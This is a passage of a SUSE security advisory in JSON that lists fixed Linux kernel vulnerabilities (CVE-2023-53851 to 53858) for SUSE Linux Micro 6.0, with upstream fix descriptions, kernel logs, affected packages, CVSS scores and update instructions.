"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53851"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dp: Drop aux devices together with DP controller\n\nUsing devres to depopulate the aux bus made sure that upon a probe\ndeferral the EDP panel device would be destroyed and recreated upon next\nattempt.\n\nBut the struct device which the devres is tied to is the DPUs\n(drm_dev-\u003edev), which may be happen after the DP controller is torn\ndown.\n\nIndications of this can be seen in the commonly seen EDID-hexdump full\nof zeros in the log, or the occasional/rare KASAN fault where the\npanel\u0027s attempt to read the EDID information causes a use after free on\nDP resources.\n\nIt\u0027s tempting to move the devres to the DP controller\u0027s struct device,\nbut the resources used by the device(s) on the aux bus are explicitly\ntorn down in the error path. The KASAN-reported use-after-free also\nremains, as the DP aux \"module\" explicitly frees its devres-allocated\nmemory in this code path.\n\nAs such, explicitly depopulate the aux bus in the error path, and in the\ncomponent unbind path, to avoid these issues.\n\nPatchwork: https://patchwork.freedesktop.org/patch/542163/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53851",
"url": "https://www.suse.com/security/cve/CVE-2023-53851"
},
{
"category": "external",
"summary": "SUSE Bug 1254695 for CVE-2023-53851",
"url": "https://bugzilla.suse.com/1254695"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53851"
},
{
"cve": "CVE-2023-53852",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53852"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-core: fix memory leak in dhchap_secret_store\n\nFree dhchap_secret in nvme_ctrl_dhchap_secret_store() before we return\nfix following kmemleack:-\n\nunreferenced object 0xffff8886376ea800 (size 64):\n comm \"check\", pid 22048, jiffies 4344316705 (age 92.199s)\n hex dump (first 32 bytes):\n 44 48 48 43 2d 31 3a 30 30 3a 6e 78 72 35 4b 67 DHHC-1:00:nxr5Kg\n 75 58 34 75 6f 41 78 73 4a 61 34 63 2f 68 75 4c uX4uoAxsJa4c/huL\n backtrace:\n [\u003c0000000030ce5d4b\u003e] __kmalloc+0x4b/0x130\n [\u003c000000009be1cdc1\u003e] nvme_ctrl_dhchap_secret_store+0x8f/0x160 [nvme_core]\n [\u003c00000000ac06c96a\u003e] kernfs_fop_write_iter+0x12b/0x1c0\n [\u003c00000000437e7ced\u003e] vfs_write+0x2ba/0x3c0\n [\u003c00000000f9491baf\u003e] ksys_write+0x5f/0xe0\n [\u003c000000001c46513d\u003e] do_syscall_64+0x3b/0x90\n [\u003c00000000ecf348fe\u003e] entry_SYSCALL_64_after_hwframe+0x72/0xdc\nunreferenced object 0xffff8886376eaf00 (size 64):\n comm \"check\", pid 22048, jiffies 4344316736 (age 92.168s)\n hex dump (first 32 bytes):\n 44 48 48 43 2d 31 3a 30 30 3a 6e 78 72 35 4b 67 DHHC-1:00:nxr5Kg\n 75 58 34 75 6f 41 78 73 4a 61 34 63 2f 68 75 4c uX4uoAxsJa4c/huL\n backtrace:\n [\u003c0000000030ce5d4b\u003e] __kmalloc+0x4b/0x130\n [\u003c000000009be1cdc1\u003e] nvme_ctrl_dhchap_secret_store+0x8f/0x160 [nvme_core]\n [\u003c00000000ac06c96a\u003e] kernfs_fop_write_iter+0x12b/0x1c0\n [\u003c00000000437e7ced\u003e] vfs_write+0x2ba/0x3c0\n [\u003c00000000f9491baf\u003e] ksys_write+0x5f/0xe0\n [\u003c000000001c46513d\u003e] do_syscall_64+0x3b/0x90\n [\u003c00000000ecf348fe\u003e] entry_SYSCALL_64_after_hwframe+0x72/0xdc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53852",
"url": "https://www.suse.com/security/cve/CVE-2023-53852"
},
{
"category": "external",
"summary": "SUSE Bug 1254653 for CVE-2023-53852",
"url": "https://bugzilla.suse.com/1254653"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53852"
},
{
"cve": "CVE-2023-53855",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53855"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: dsa: ocelot: call dsa_tag_8021q_unregister() under rtnl_lock() on driver remove\n\nWhen the tagging protocol in current use is \"ocelot-8021q\" and we unbind\nthe driver, we see this splat:\n\n$ echo \u00270000:00:00.2\u0027 \u003e /sys/bus/pci/drivers/fsl_enetc/unbind\nmscc_felix 0000:00:00.5 swp0: left promiscuous mode\nsja1105 spi2.0: Link is Down\nDSA: tree 1 torn down\nmscc_felix 0000:00:00.5 swp2: left promiscuous mode\nsja1105 spi2.2: Link is Down\nDSA: tree 3 torn down\nfsl_enetc 0000:00:00.2 eno2: left promiscuous mode\nmscc_felix 0000:00:00.5: Link is Down\n------------[ cut here ]------------\nRTNL: assertion failed at net/dsa/tag_8021q.c (409)\nWARNING: CPU: 1 PID: 329 at net/dsa/tag_8021q.c:409 dsa_tag_8021q_unregister+0x12c/0x1a0\nModules linked in:\nCPU: 1 PID: 329 Comm: bash Not tainted 6.5.0-rc3+ #771\npc : dsa_tag_8021q_unregister+0x12c/0x1a0\nlr : dsa_tag_8021q_unregister+0x12c/0x1a0\nCall trace:\n dsa_tag_8021q_unregister+0x12c/0x1a0\n felix_tag_8021q_teardown+0x130/0x150\n felix_teardown+0x3c/0xd8\n dsa_tree_teardown_switches+0xbc/0xe0\n dsa_unregister_switch+0x168/0x260\n felix_pci_remove+0x30/0x60\n pci_device_remove+0x4c/0x100\n device_release_driver_internal+0x188/0x288\n device_links_unbind_consumers+0xfc/0x138\n device_release_driver_internal+0xe0/0x288\n device_driver_detach+0x24/0x38\n unbind_store+0xd8/0x108\n drv_attr_store+0x30/0x50\n---[ end trace 0000000000000000 ]---\n------------[ cut here ]------------\nRTNL: assertion failed at net/8021q/vlan_core.c (376)\nWARNING: CPU: 1 PID: 329 at net/8021q/vlan_core.c:376 vlan_vid_del+0x1b8/0x1f0\nCPU: 1 PID: 329 Comm: bash Tainted: G W 6.5.0-rc3+ #771\npc : vlan_vid_del+0x1b8/0x1f0\nlr : vlan_vid_del+0x1b8/0x1f0\n dsa_tag_8021q_unregister+0x8c/0x1a0\n felix_tag_8021q_teardown+0x130/0x150\n felix_teardown+0x3c/0xd8\n dsa_tree_teardown_switches+0xbc/0xe0\n dsa_unregister_switch+0x168/0x260\n felix_pci_remove+0x30/0x60\n pci_device_remove+0x4c/0x100\n device_release_driver_internal+0x188/0x288\n device_links_unbind_consumers+0xfc/0x138\n device_release_driver_internal+0xe0/0x288\n device_driver_detach+0x24/0x38\n unbind_store+0xd8/0x108\n drv_attr_store+0x30/0x50\nDSA: tree 0 torn down\n\nThis was somewhat not so easy to spot, because \"ocelot-8021q\" is not the\ndefault tagging protocol, and thus, not everyone who tests the unbinding\npath may have switched to it beforehand. The default\nfelix_tag_npi_teardown() does not require rtnl_lock() to be held.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53855",
"url": "https://www.suse.com/security/cve/CVE-2023-53855"
},
{
"category": "external",
"summary": "SUSE Bug 1254688 for CVE-2023-53855",
"url": "https://bugzilla.suse.com/1254688"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53855"
},
{
"cve": "CVE-2023-53856",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53856"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nof: overlay: Call of_changeset_init() early\n\nWhen of_overlay_fdt_apply() fails, the changeset may be partially\napplied, and the caller is still expected to call of_overlay_remove() to\nclean up this partial state.\n\nHowever, of_overlay_apply() calls of_resolve_phandles() before\ninit_overlay_changeset(). Hence if the overlay fails to apply due to an\nunresolved symbol, the overlay_changeset.cset.entries list is still\nuninitialized, and cleanup will crash with a NULL-pointer dereference in\noverlay_removal_is_ok().\n\nFix this by moving the call to of_changeset_init() from\ninit_overlay_changeset() to of_overlay_fdt_apply(), where all other\nearly initialization is done.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53856",
"url": "https://www.suse.com/security/cve/CVE-2023-53856"
},
{
"category": "external",
"summary": "SUSE Bug 1254661 for CVE-2023-53856",
"url": "https://bugzilla.suse.com/1254661"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53856"
},
{
"cve": "CVE-2023-53857",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53857"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: bpf_sk_storage: Fix invalid wait context lockdep report\n\n\u0027./test_progs -t test_local_storage\u0027 reported a splat:\n\n[ 27.137569] =============================\n[ 27.138122] [ BUG: Invalid wait context ]\n[ 27.138650] 6.5.0-03980-gd11ae1b16b0a #247 Tainted: G O\n[ 27.139542] -----------------------------\n[ 27.140106] test_progs/1729 is trying to lock:\n[ 27.140713] ffff8883ef047b88 (stock_lock){-.-.}-{3:3}, at: local_lock_acquire+0x9/0x130\n[ 27.141834] other info that might help us debug this:\n[ 27.142437] context-{5:5}\n[ 27.142856] 2 locks held by test_progs/1729:\n[ 27.143352] #0: ffffffff84bcd9c0 (rcu_read_lock){....}-{1:3}, at: rcu_lock_acquire+0x4/0x40\n[ 27.144492] #1: ffff888107deb2c0 (\u0026storage-\u003elock){..-.}-{2:2}, at: bpf_local_storage_update+0x39e/0x8e0\n[ 27.145855] stack backtrace:\n[ 27.146274] CPU: 0 PID: 1729 Comm: test_progs Tainted: G O 6.5.0-03980-gd11ae1b16b0a #247\n[ 27.147550] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014\n[ 27.149127] Call Trace:\n[ 27.149490] \u003cTASK\u003e\n[ 27.149867] dump_stack_lvl+0x130/0x1d0\n[ 27.152609] dump_stack+0x14/0x20\n[ 27.153131] __lock_acquire+0x1657/0x2220\n[ 27.153677] lock_acquire+0x1b8/0x510\n[ 27.157908] local_lock_acquire+0x29/0x130\n[ 27.159048] obj_cgroup_charge+0xf4/0x3c0\n[ 27.160794] slab_pre_alloc_hook+0x28e/0x2b0\n[ 27.161931] __kmem_cache_alloc_node+0x51/0x210\n[ 27.163557] __kmalloc+0xaa/0x210\n[ 27.164593] bpf_map_kzalloc+0xbc/0x170\n[ 27.165147] bpf_selem_alloc+0x130/0x510\n[ 27.166295] bpf_local_storage_update+0x5aa/0x8e0\n[ 27.167042] bpf_fd_sk_storage_update_elem+0xdb/0x1a0\n[ 27.169199] bpf_map_update_value+0x415/0x4f0\n[ 27.169871] map_update_elem+0x413/0x550\n[ 27.170330] __sys_bpf+0x5e9/0x640\n[ 27.174065] __x64_sys_bpf+0x80/0x90\n[ 27.174568] do_syscall_64+0x48/0xa0\n[ 27.175201] entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n[ 27.175932] RIP: 0033:0x7effb40e41ad\n[ 27.176357] Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d8\n[ 27.179028] RSP: 002b:00007ffe64c21fc8 EFLAGS: 00000202 ORIG_RAX: 0000000000000141\n[ 27.180088] RAX: ffffffffffffffda RBX: 00007ffe64c22768 RCX: 00007effb40e41ad\n[ 27.181082] RDX: 0000000000000020 RSI: 00007ffe64c22008 RDI: 0000000000000002\n[ 27.182030] RBP: 00007ffe64c21ff0 R08: 0000000000000000 R09: 00007ffe64c22788\n[ 27.183038] R10: 0000000000000064 R11: 0000000000000202 R12: 0000000000000000\n[ 27.184006] R13: 00007ffe64c22788 R14: 00007effb42a1000 R15: 0000000000000000\n[ 27.184958] \u003c/TASK\u003e\n\nIt complains about acquiring a local_lock while holding a raw_spin_lock.\nIt means it should not allocate memory while holding a raw_spin_lock\nsince it is not safe for RT.\n\nraw_spin_lock is needed because bpf_local_storage supports tracing\ncontext. In particular for task local storage, it is easy to\nget a \"current\" task PTR_TO_BTF_ID in tracing bpf prog.\nHowever, task (and cgroup) local storage has already been moved to\nbpf mem allocator which can be used after raw_spin_lock.\n\nThe splat is for the sk storage. For sk (and inode) storage,\nit has not been moved to bpf mem allocator. Using raw_spin_lock or not,\nkzalloc(GFP_ATOMIC) could theoretically be unsafe in tracing context.\nHowever, the local storage helper requires a verifier accepted\nsk pointer (PTR_TO_BTF_ID), it is hypothetical if that (mean running\na bpf prog in a kzalloc unsafe context and also able to hold a verifier\naccepted sk pointer) could happen.\n\nThis patch avoids kzalloc after raw_spin_lock to silent the splat.\nThere is an existing kzalloc before the raw_spin_lock. At that point,\na kzalloc is very likely required because a lookup has just been done\nbefore. Thus, this patch always does the kzalloc before acq\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53857",
"url": "https://www.suse.com/security/cve/CVE-2023-53857"
},
{
"category": "external",
"summary": "SUSE Bug 1254648 for CVE-2023-53857",
"url": "https://bugzilla.suse.com/1254648"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53857"
},
{
"cve": "CVE-2023-53858",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53858"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: serial: samsung_tty: Fix a memory leak in s3c24xx_serial_getclk() in case of error\n\nIf clk_get_rate() fails, the clk that has just been allocated needs to be\nfreed.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
